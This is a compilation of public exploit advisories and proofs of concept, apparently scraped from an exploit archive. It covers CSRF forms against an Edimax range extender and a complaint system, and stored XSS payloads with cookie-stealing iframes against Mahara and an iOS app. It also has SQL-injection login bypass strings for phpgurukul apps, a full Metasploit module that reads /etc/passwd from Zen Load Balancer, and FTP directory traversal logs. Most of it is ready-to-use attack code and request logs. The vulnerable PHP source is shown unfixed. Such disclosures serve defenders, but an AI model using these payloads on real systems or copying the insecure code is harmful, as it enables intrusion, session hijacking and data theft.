*Security Engineer*
-
Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering)
# Exploit Title: Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering)
# Date: 2020-04-21
# Exploit Author: Besim ALTINOK
# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
# Version:1.13
# Tested on: Edimax EW-7438RPn 1.13 Version

CSRF PoC - Mac Filtering
----------------------------------------------------------------------------------------------------------

<!--
Review note (defensive): the POST to /goform/formWlAc carries only the
handler's own parameters (wlanAcEnabled, tiny_idx, mac, comment,
addFilterMac, submit-url, wlanSSIDIndex) and no per-session anti-CSRF
token, so a browser that already holds a session for the device will
submit it from any origin. The history.pushState call only rewrites the
visible address bar of the attacker page and has no effect on the device.
From the field values, an accepted request turns wireless access control on
and adds one MAC entry with the given comment. The device-side fix is a
random per-session token verified by formWlAc plus a SameSite attribute on
the session cookie; checking the Origin header is a cheap complement.
-->

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://172.20.10.2/goform/formWlAc" method="POST">
      <input type="hidden" name="wlanAcEnabled" value="ON" />
      <input type="hidden" name="tiny_idx" value="0" />
      <input type="hidden" name="mac" value="ccbbbbbbbbbb" />
      <input type="hidden" name="comment" value="PentesterTraining" />
      <input type="hidden" name="addFilterMac" value="Add" />
      <input type="hidden" name="submit-url" value="/macfilter1_sub1.asp" />
      <input type="hidden" name="wlanSSIDIndex" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

--
Besim ALTINOK
*Security Engineer*
-
Mahara 19.10.2 CMS - Persistent Cross-Site Scripting
# Title: Mahara 19.10.2 CMS - Persistent Cross-Site Scripting # Author: Vulnerability Laboratory # Date: 2020-04-21 # Vendor: https://mahara.org # Software Link: https://launchpad.net/mahara # CVE: N/A Document Title: =============== Mahara v19.10.2 CMS - Persistent Cross Site Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2217 Release Date: ============= 2020-04-21 Common Vulnerability Scoring System: ==================================== 4.3 Affected Product(s): ==================== Catalyst IT Ltd. Product: Mahara v19.10.2 - CMS (Web-Application) https://launchpad.net/mahara & https://mahara.org Vulnerability Disclosure Timeline: ================================== 2020-04-21: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Mahara v19.10.2 CMS web-application series. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent vulnerability is located in the `nombre` and `descripción` parameters of the `Ficheros` module in the `groupfiles.php` file. Remote attackers with low privileges are able to inject own malicious persistent script code as files and foldernames. The injected code can be used to attack the frontend or backend of the web-application. The request method to inject is POST and the attack vector is located on the application-side. Files are able to be reviewed in the backend by higher privileged accounts and can be shared. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. 
Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Ficheros (Files Manager)

Vulnerable Input(s):
[+] Crear Carpeta

Vulnerable File(s):
[+] groupfiles.php

Vulnerable Parameter(s):
[+] nombre
[+] descripción

Affected Module(s):
[+] Página principal


Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by a low-privileged web application user account with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce ...
1. Open the web-application and login as regular user
2. Move inside the mygroup management
3. Open the ficheros tab on top
4. Inject test payload into the crear carpeta (Nombre & Descripción) input field for the página principal to output
Note: The execution point occurs on edit, list and delete interaction
5. The created path listings are available for higher privileged user account that review (Backend)
6. Successful reproduction of the persistent cross-site web vulnerability!
PoC: Vulnerable Source (Inject via Crear Carpeta Input for Página Principal) <tr id="file:7191" class="file-item folder no-hover ui-droppable"> <td class="icon-cell"> <div class="icon-drag ui-draggable ui-draggable-handle" id="drag:7191" tabindex="0"> <span class="sr-only">Seleccionar y arrastrar para mover >"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe></span> <span class="icon-folder-open icon icon-lg " role="presentation" aria-hidden="true"></span> </div></td> <td class="filename"> <a href="https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=7191&owner=group&ownerid=27" id="changefolder:7191" class="inner-link changefolder"> <span class="sr-only">Carpeta:</span> <span class="display-title ">>"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe></span> </a></td> <td class="filedescription d-none d-md-table-cell"> >"<iframe></iframe> >"<iframe></iframe></td> <td class="filesize"></td> <td class="filedate">20/04/2020</td> <!-- Ensure space for 3 buttons (in the case of a really long single line string in a user input field --> <td class="text-right control-buttons "> <div class="btn-group"> ... ... 
<button name="files_filebrowser_edit[7191]" class="btn btn-secondary btn-sm"> <span class="icon icon-pencil-alt icon-lg" role="presentation" aria-hidden="true"></span> <span class="sr-only">Edit folder ">"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>"</span></button> <button name="files_filebrowser_delete[7191]" class="btn btn-secondary btn-sm"> <span class="icon icon-trash-alt text-danger icon-lg" role="presentation" aria-hidden="true"></span> <span class="sr-only">Delete folder ">"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>"</span> </button></div></td> --- PoC Session Logs [POST] --- (Mygroup Ficheros) https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 Host: mahara_cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------98107146915324237501974151621 Content-Length: 4879 Origin: https://mahara_cms.localhost:8080 Connection: keep-alive Referer: https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& 
files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_edit_orientation=0& files_filebrowser_edit_title=>"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>&files_filebrowser_edit_description=>"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>&files_filebrowser_permission:member:view=on&files_filebrowser_permission:member:edit=on& files_filebrowser_permission:member:republish=on&files_filebrowser_edit_license=&files_filebrowser_edit_license_other=& files_filebrowser_edit_licensor=>"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>&files_filebrowser_edit_licensorurl=>"<iframe src=evil.source onload=alert(document.cookie)></iframe> >"<iframe src=evil.source onload=alert(document.cookie)></iframe>&files_filebrowser_edit_allowcomments=on& files_filebrowser_update[7191]=Guardar cambios&sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1,1 - POST: HTTP/2.0 200 OK content-type: text/html; charset=UTF-8 vary: Accept-Encoding cache-control: no-store, no-cache, must-revalidate set-cookie: mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; path=/; secure; HttpOnly content-encoding: br X-Firefox-Spdy: h2- https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= - Host: mahara_cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; 
boundary=---------------------------126319663526561351602937008964 Content-Length: 3721 Origin: https://mahara_cms.localhost:8080 Connection: keep-alive Referer: https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_delete[7192]=&files_filebrowser_edit_orientation=0&files_filebrowser_edit_title=&files_filebrowser_edit_description=&files_filebrowser_edit_license=& files_filebrowser_edit_license_other=&files_filebrowser_edit_licensor=&files_filebrowser_edit_licensorurl=& sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1 - GET: HTTP/2.0 200 OK content-type: text/html; charset=UTF-8 vary: Accept-Encoding cache-control: no-store, no-cache, must-revalidate set-cookie: mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; path=/; secure; HttpOnly content-encoding: br X-Firefox-Spdy: h2 Reference(s): https://mahara_cms.localhost:8080/artefact/ https://mahara_cms.localhost:8080/artefact/file/ https://mahara_cms.localhost:8080/artefact/file/groupfiles.php Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM
-
User Management System 2.0 - Persistent Cross-Site Scripting
# Exploit Title: User Management System 2.0 - Persistent Cross-Site Scripting # Author: Besim ALTINOK # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ # Version: v2.0 # Tested on: Xampp # Credit: İsmail BOZKURT ------ Details: 1- Vulnerable code is here: Insert user registration information to the DB without filtering. if(isset($_POST['signup'])) { $fname=$_POST['fname']; $lname=$_POST['lname']; $email=$_POST['email']; $password=$_POST['password']; $contact=$_POST['contact']; $enc_password=$password; $msg=mysqli_query($con,"insert into users(fname,lname,email,password,contactno) values('$fname','$lname','$email','$enc_password','$contact')"); if($msg) { echo "<script>alert('Register successfully');</script>"; } } 2- In the admin dashboard: Get fullName from DB and print it without any filtering <?php $ret=mysqli_query($con,"select * from users"); $cnt=1; while($row=mysqli_fetch_array($ret)) {?> <tr> <td><?php echo $cnt;?></td> <td><?php echo $row['fname'];?></td> <td><?php echo $row['lname'];?></td> <td><?php echo $row['email'];?></td> <td><?php echo $row['contactno'];?></td> <td><?php echo $row['posting_date'];?></td> </tr> 4- If we insert value of the "fname" as "script>prompt(1)</script>", we can perform this attack as "Stored XSS"
-
User Management System 2.0 - Authentication Bypass
# Exploit Title: User Management System 2.0 - Authentication Bypass # Author: Besim ALTINOK # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ # Version: v2.0 # Tested on: Xampp # Credit: İsmail BOZKURT ------ Details: 1- The vulnerable code is in the admin login (/admin/index.php); the submitted username is concatenated directly into the SQL query without parameterization or escaping: <?php session_start(); include("dbconnection.php"); if(isset($_POST['login'])) { $adminusername=$_POST['username']; $pass=md5($_POST['password']); $ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'"); $num=mysqli_fetch_array($ret); if($num>0) { $extra="manage-users.php"; $_SESSION['login']=$_POST['username']; $_SESSION['id']=$num['id']; echo "<script>window.location.href='".$extra."'</script>"; exit(); } else { $_SESSION['action1']="*Invalid username or password"; $extra="index.php"; echo "<script>window.location.href='".$extra."'</script>"; exit(); } } 2- We can bypass authentication with SQLi: Bypass code (user and admin login panel): Username: pentester' or'1'=1# Password : pentester' or'1'=1# Finally: there are many other SQL-injectable inputs in this project, such as login, registration and forgot password.
-
Complaint Management System 4.2 - Persistent Cross-Site Scripting
# Exploit Title: Complaint Management System 4.2 - Persistent Cross-Site Scripting # Author: Besim ALTINOK # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/complaint-management-sytem/ # Version: v4.2 # Tested on: Xampp # Credit: İsmail BOZKURT ------ Details: 1- The vulnerable page is: http://localhost/cms/users/registration.php 2- Vulnerable code: the user registration data is inserted into the DB without any filtering. if(isset($_POST['submit'])) { $fullname=$_POST['fullname']; $email=$_POST['email']; $password=md5($_POST['password']); $contactno=$_POST['contactno']; $status=1; $query=mysqli_query($con,"insert into users(fullName,userEmail,password,contactNo,status) values('$fullname','$email','$password','$contactno','$status')"); $msg="Registration successfull. Now You can login !"; } ?> 3- In the admin dashboard, fullName is read from the DB and printed without any output encoding: <tr> <td colspan="2"><b><?php echo $row['fullName'];?>'s profile</b></td> </tr> 4- If we register with "fullName" set to "script>prompt(2)</script>", the payload is stored and rendered in the admin dashboard, i.e. a stored XSS. 5- Screenshot in the attachment ---------------------------------------------------
-
Complaint Management System 4.2 - Authentication Bypass
# Exploit Title: Complaint Management System 4.2 - Authentication Bypass # Author: Besim ALTINOK # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/complaint-management-sytem/ # Version: v4.2 # Tested on: Xampp # Credit: İsmail BOZKURT ------ Details: 1- Vulnerable code is here: if(isset($_POST['submit'])) { $username=$_POST['username']; $password=md5($_POST['password']); $ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$username' and password='$password'"); $num=mysqli_fetch_array($ret); if($num>0) { $extra="change-password.php";// $_SESSION['alogin']=$_POST['username']; $_SESSION['id']=$num['id']; $host=$_SERVER['HTTP_HOST']; $uri=rtrim(dirname($_SERVER['PHP_SELF']),'/\\'); header("location:http://$host$uri/$extra"); exit(); } 2- We can bypass authentication with SQLi: Bypass code (admin login panel): Username: pentester' or'1'=1# Password : pentester' or'1'=1# Finally: There is a lot of SQLi input in this project. Like, login, registration, forgot password ... -----------------------------------
-
Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)
# Exploit Title: Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User) # Author: Besim ALTINOK # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/complaint-management-sytem/ # Version: v4.2 # Tested on: Xampp # Credit: İsmail BOZKURT ************************************************* Detail: You can perform CSRF Attack for all the functions. ---------------------------------------------- CSRF PoC for Delete User ---------------------------------------------- This request performs over the GET request with uid. ------------------------------------------------------------------------ <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/cms/admin/manage-users.php"> <input type="hidden" name="uid" value="4" /> <input type="hidden" name="" value="" /> <input type="hidden" name="action" value="del" /> <input type="submit" value="Submit request" /> </form> </body> </html>
-
Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Zen Load Balancer Directory Traversal", 'Description' => %q{ This module exploits a authenticated directory traversal vulnerability in Zen Load Balancer `v3.10.1`. The flaw exists in 'index.cgi' not properly handling 'filelog=' parameter which allows a malicious actor to load arbitrary file path. }, 'License' => MSF_LICENSE, 'Author' => [ 'Basim Alabdullah', # Vulnerability discovery 'Dhiraj Mishra' # Metasploit module ], 'References' => [ ['EDB', '48308'] ], 'DisclosureDate' => "Apr 10 2020" )) register_options( [ Opt::RPORT(444), OptBool.new('SSL', [true, 'Use SSL', true]), OptInt.new('DEPTH', [true, 'The max traversal depth', 16]), OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/passwd']), OptString.new('TARGETURI', [true, "The base URI path of the ZenConsole install", '/']), OptString.new('HttpUsername', [true, 'The username to use for the HTTP server', 'admin']), OptString.new('HttpPassword', [false, 'The password to use for the HTTP server', 'admin']) ]) end def run_host(ip) filename = datastore['FILEPATH'] traversal = "../" * datastore['DEPTH'] res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.cgi'), 'vars_get'=> { 'id' => '2-3', 'filelog' => "#{traversal}#(unknown)", 'nlines' => '100', 'action' => 'See logs' }, 'authorization' => basic_auth(datastore['HttpUsername'],datastore['HttpPassword']) }, 25) unless res && res.code == 200 print_error('Nothing was downloaded') return end print_good("#{peer} - Downloaded #{res.body.length} bytes") path = store_loot( 'zenload.http', 'text/plain', ip, res.body, filename ) print_good("File saved in: #{path}") end end
-
Library CMS Powerful Book Management System 2.2.0 - Session Fixation
# Exploit Title: Library CMS Powerful Book Management System 2.2.0 - Session Fixation # Date: 2020-04-22 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://kaasoft.pro/ # Software : https://codecanyon.net/item/library-cms-powerful-book-management-system/21105281 # Product Version: v2.2.0 # Product : Library CMS # Vulnerability Type : Broken Authentication # Vulnerability : Session Fixation # CVE : N/A # Description : A Session Fixation vulnerability has been discovered in version 2.2.0 of Library CMS Powerful Book Management System. Note that both login requests below carry the same PHPSESSID cookie value; a session identifier that is accepted across authentications unchanged is what makes fixation possible. Admin HTTP Request : POST /admin/login HTTP/1.1 Host: XXX.XXX.XXX.XXX User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://XXX.XXX.XXX.XXX/admin/login Content-Type: application/x-www-form-urlencoded Content-Length: 49 Connection: close Cookie: activeLanguage=en_US; PHPSESSID=nfj6gk1murk6jq47lpk5cv7qq6; activeLanguage=en_US; _ym_uid=1579299191562269050; _ym_d=1579299191; _ym_visorc_46947615=w; _ym_isad=2 Upgrade-Insecure-Requests: 1 login=USERNAME&password=PASSWORD Member HTTP Request : POST /admin/login HTTP/1.1 Host: XXX.XXX.XXX.XXX User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://XXX.XXX.XXX.XXX/admin/login Content-Type: application/x-www-form-urlencoded Content-Length: 50 Connection: close Cookie: activeLanguage=en_US; PHPSESSID=nfj6gk1murk6jq47lpk5cv7qq6; activeLanguage=en_US; _ym_uid=1579299191562269050; _ym_d=1579299191; _ym_visorc_46947615=w; _ym_isad=2 Upgrade-Insecure-Requests: 1 login=USERNAME&password=PASSWORD
-
Sky File 2.1.0 iOS - Directory Traversal
# Title: Sky File 2.1.0 iOS - Directory Traversal # Author: Vulnerability Laboratory # Date: 2020-04-21 # Software Link: https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210 # CVE: N/A Document Title: =============== Sky File v2.1.0 iOS - Multiple Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2207 Common Vulnerability Scoring System: ==================================== 7.2 Affected Product(s): ==================== Jin Chen Product: Sky File v2.1.0 - (iOS) Mobile Web Application (https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210) Vulnerability Disclosure Timeline: ================================== 2020-04-21: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ 1.1 Multiple persistent cross-site scripting vulnerabilities have been discovered in the official Sky File v2.1.0 mobile iOS web application. The vulnerability allows remote attackers to inject their own malicious script code, with a persistent attack vector, to compromise browser-to-web-application requests from the application side. The cross-site scripting vulnerability is located in the 'createFolder' module. Remote attackers with access to the UI via wifi are able to inject their own persistent malicious script code to compromise the web application or user credentials. The request method used to inject is POST and the attack vector is located on the application side. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and application-side manipulation of the web context of the affected and connected device module. 1.2 A directory traversal web vulnerability has been discovered in the official Sky File v2.1.0 mobile iOS web application. The web vulnerability allows an attacker to change the path or directory without authorization and access sensitive application data. 
The directory / path web vulnerability is located in the local FTP server's configuration and path validation, which grants insecure access permissions. Normally the anonymous user account is only able to move inside the main app folder, not above it into the web-server and root application files. Because of this issue, remote attackers are able to connect to the wifi FTP server with the anonymous user account credentials. After that the attacker can use a misconfiguration in the FTP server's handling of the app path to transmit `/null//` path commands after CWD and CDUP navigation via an FTP client. This allows the attacker to gain unauthorized access to the main root application path. Successful exploitation of the directory traversal vulnerability results in unauthorized file system access and information disclosure. Proof of Concept (PoC): ======================= 1.1 The persistent script code injection vulnerability can be exploited by remote attackers with wifi network access and low user interaction. For security demonstration or to reproduce the web vulnerability, follow the provided information and steps below. 
PoC: Payload %2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E --- PoC Session Logs [POST] --- Status: 200[OK] POST http://localhost:10000/create Mime Type[application/json] Request Header: Host[localhost:10000] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] X-Requested-With[XMLHttpRequest] Referer[http://localhost:10000/] Content-Length[140] Connection[keep-alive] POST-Daten: path[%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E] Response Header: Cache-Control[no-cache] Content-Length[2] Content-Type[application/json] Connection[Close] Server[GCDWebUploader] - Status: 200[OK] GET http://localhost:10000/list?path=%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E Mime Type[application/json] Request Header: Host[localhost:10000] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[XMLHttpRequest] Referer[http://localhost:10000/] Connection[keep-alive] Response Header: Cache-Control[no-cache] Content-Length[2] Content-Type[application/json] Connection[Close] Server[GCDWebUploader] - Status: 200[OK] GET http://localhost:10000/evil.source Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:10000] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:10000/] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Server[GCDWebUploader] 
Connection[Close] 1.2 The directory traversal web vulnerability can be exploited by remote attackers with wifi network access without user interaction. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce ... 1. Open the ftp preview the visible folders 2. Jump back to the the following path /private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/ 3. Include the payload /(null)// and refresh via list command 4. You are now placed in an empty folder without permission to move 5. Add to /(null)/../ to the path and refresh the client 6. Path traversal successful to access the main app root path (./) that is normally not accessable 7. Successful reproduce of the path traversal web vulnerability! PoC: Payload /(null)// to /(null)/../ --- PoC Sessio Logs (FTP) --- [21:52:40] [R] 221- Data traffic for this session was 0 bytes in 0 files [21:52:40] [R] 221 Thank you for using the FTP service on localhost. [21:52:40] [R] Logged off: 192.168.2.116 (Duration: 26 seconds) [21:52:42] [R] Connecting to 192.168.2.116 -> IP=192.168.2.116 PORT=10001 [21:52:42] [R] Connected to 192.168.2.116 [21:52:42] [R] 220 iosFtp server ready. [21:52:42] [R] USER anonymous [21:52:42] [R] 331 Password required for (null) [21:52:42] [R] PASS (hidden) [21:52:42] [R] 230 User (null) logged in. [21:52:42] [R] SYST [21:52:42] [R] 215 UNIX Type: L8 Version: iosFtp 20080912 [21:52:42] [R] FEAT [21:52:42] [R] 211-Features supported [21:52:42] [R] UTF8 [21:52:42] [R] 211 End [21:52:42] [R] OPTS UTF8 ON [21:52:42] [R] 200 Type set Opts to UTF8. [21:52:42] [R] PWD [21:52:42] [R] 257 "/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder" is the current directory. [21:52:42] [R] CWD /(null)/ [21:52:42] [R] 550 CWD failed. 
[21:52:42] [R] PWD [21:52:42] [R] 257 "/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder" is the current directory. [21:52:42] [R] PASV [21:52:42] [R] 227 Entering Passive Mode (192,168,2,116,39,252) [21:52:42] [R] Opening data connection IP: 192.168.2.116 PORT: 10236 [21:52:42] [R] LIST -al [21:52:42] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:52:42] [R] 226 Transfer complete. [21:52:42] [R] List Complete: 149 bytes in 0,08 seconds (0,1 KB/s) [21:52:43] [R] CDUP [21:52:43] [R] 250 CDUP command successful. [21:52:43] [R] PWD [21:52:43] [R] 257 "/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder" is the current directory. [21:52:43] [R] PASV [21:52:43] [R] 227 Entering Passive Mode (192,168,2,116,87,51) [21:52:43] [R] Opening data connection IP: 192.168.2.116 PORT: 22323 [21:52:43] [R] LIST -al [21:52:43] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:52:43] [R] 226 Transfer complete. [21:52:43] [R] List Complete: 308 bytes in 0,10 seconds (0,3 KB/s) [21:52:43] [R] CDUP [21:52:44] [R] 250 CDUP command successful. [21:52:44] [R] PWD [21:52:44] [R] 257 "/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents" is the current directory. [21:52:44] [R] PASV [21:52:44] [R] 227 Entering Passive Mode (192,168,2,116,151,51) [21:52:44] [R] Opening data connection IP: 192.168.2.116 PORT: 38707 [21:52:44] [R] LIST -al [21:52:44] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:52:44] [R] 226 Transfer complete. [21:52:44] [R] List Complete: 127 bytes in 0,08 seconds (0,1 KB/s) [21:53:34] [R] CDUP [21:53:34] [R] 250 CDUP command successful. [21:53:34] [R] PWD [21:53:34] [R] 257 "/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45" is the current directory. 
[21:53:34] [R] PASV [21:53:34] [R] 227 Entering Passive Mode (192,168,2,116,227,14) [21:53:34] [R] Opening data connection IP: 192.168.2.116 PORT: 58126 [21:53:34] [R] LIST -al [21:53:34] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:53:34] [R] 226 Transfer complete. [21:53:34] [R] List Complete: 312 bytes in 0,08 seconds (0,3 KB/s) [21:53:35] [R] CDUP [21:53:35] [R] 250 CDUP command successful. [21:53:35] [R] PWD [21:53:35] [R] 257 "(null)" is the current directory. [21:53:35] [R] PASV [21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,159,14) [21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 40718 [21:53:35] [R] LIST -al [21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:53:35] [R] 226 Transfer complete. [21:53:35] [R] List Complete: 0 bytes in 0,07 seconds (0,0 KB/s) [21:53:35] [R] PASV [21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,143,14) [21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 36622 [21:53:35] [R] LIST -al [21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:53:35] [R] 226 Transfer complete. [21:53:35] [R] List Complete: 0 bytes in 0,06 seconds (0,0 KB/s) [21:53:36] [R] CDUP [21:53:36] [R] 550 CDUP command failed. [21:53:41] [R] CWD /etc [21:53:41] [R] 250 CWD command successful. [21:53:41] [R] PWD [21:53:41] [R] 257 "(null)" is the current directory. [21:53:48] [R] CDUP [21:53:48] [R] 550 CDUP command failed. [21:53:51] [R] CWD / [21:53:51] [R] 250 CWD command successful. [21:53:51] [R] PWD [21:53:51] [R] 257 "/" is the current directory. [21:53:51] [R] PASV [21:53:51] [R] 227 Entering Passive Mode (192,168,2,116,221,173) [21:53:51] [R] Opening data connection IP: 192.168.2.116 PORT: 56749 [21:53:51] [R] LIST -al [21:53:51] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:53:51] [R] 226 Transfer complete. [21:53:51] [R] List Complete: 741 bytes in 0,10 seconds (0,7 KB/s) [21:54:02] [R] TYPE I [21:54:02] [R] 200 Type set to I. 
